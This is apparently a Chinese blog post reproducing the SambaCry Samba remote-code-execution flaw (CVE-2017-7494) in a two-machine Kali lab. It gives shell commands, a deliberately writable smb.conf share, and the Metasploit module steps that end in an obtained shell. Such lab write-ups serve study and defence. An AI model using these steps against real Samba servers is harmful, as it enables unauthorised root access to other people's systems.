linux版本wannacry,Linux版永恒之蓝

66b52468c121889b900d4956032f1009.png

8种机械键盘轴体对比

本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?

漏洞概述

2017年5月24号,Samba官方发布4.6.4版本,声明修复了一个严重漏洞(CVE-2017-7494),可以造成远程代码执行,运行Samba服务的Linux/Unix设备,可能会被直接getshell。

Samba是在Linux或Unix系统上用来实现文件共享和打印服务的通信协议,也是很多家用的智能硬件设备例如NAS设备内置的协议,采用服务端口445。由于Samba内置函数is_known_pipename里面出现字符过滤问题,导致攻击者可以向共享目录传递恶意文件,导致被远程代码执行。

影响版本

Samba 3.5.0 ~ 4.5.10中间的所有版本。

漏洞复现环境

Kali Linux 2018 –> Kali Linux 2017

渗透机:Kali Linux 2018(ip:192.168.31.85)

靶机:Kali Linux 2017(ip:192.168.31.184)

Kali Linux 2017,查看Samba版本1samba --version Version 4.5.8-Debian

88ae517efa4ad13f82face014f0cf985.png

Kali Linux 2017里面创建Samba共享目录1

2mkdir /tmp/public //创建共享目录

chmod 777 /tmp/public //修改读写执行权限

38d8d262b59c606fb60b224a6a7cf61b.png

这是SambaCry漏洞利用的前提,必须有一个共享目录,这样攻击者就可以在这个共享目录传递攻击代码并执行,获取到Root权限并控制肉鸡。

Kali Linux 2017 修改Samba配置文件1

2

3

4

5

6

7

8

9vim /etc/samba/smb.conf

[public]

comment = public

browseable = yes

writeable = yes

path = /tmp/public

public = yes

read only = no

dade9e8bf5ae7c426f3c74f3e986c8b5.png

Kali Linux 2017 重启/启动Samba服务1

2/etc/init.d/samba restart //重启samba服务

netstat -tnlp samba //查看samba端口状态

39b0a11af297668207e19f31605d9824.png

开始攻击

Kali Linux 2018 进入msf框架,使用SambaCry渗透模块1

2

3msfconsole //进入msf

use exploit/linux/samba/is_known_pipename //使用渗透模块is_known_pipename

info //查看模块信息

0d1f20c1078e0cd189756f464102200a.png1show options //查看模块选项

fc9b51354ac1892c7aaef5b589535528.png1

2set RHOST 192.168.31.184 //设置靶机地址

exploit //开始攻击

11e1f6d1da30dc2506f0ee1792666b77.png

成功拿到shell。

c9f96d96a86b154bafc23d210a219eef.png

参考文章

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值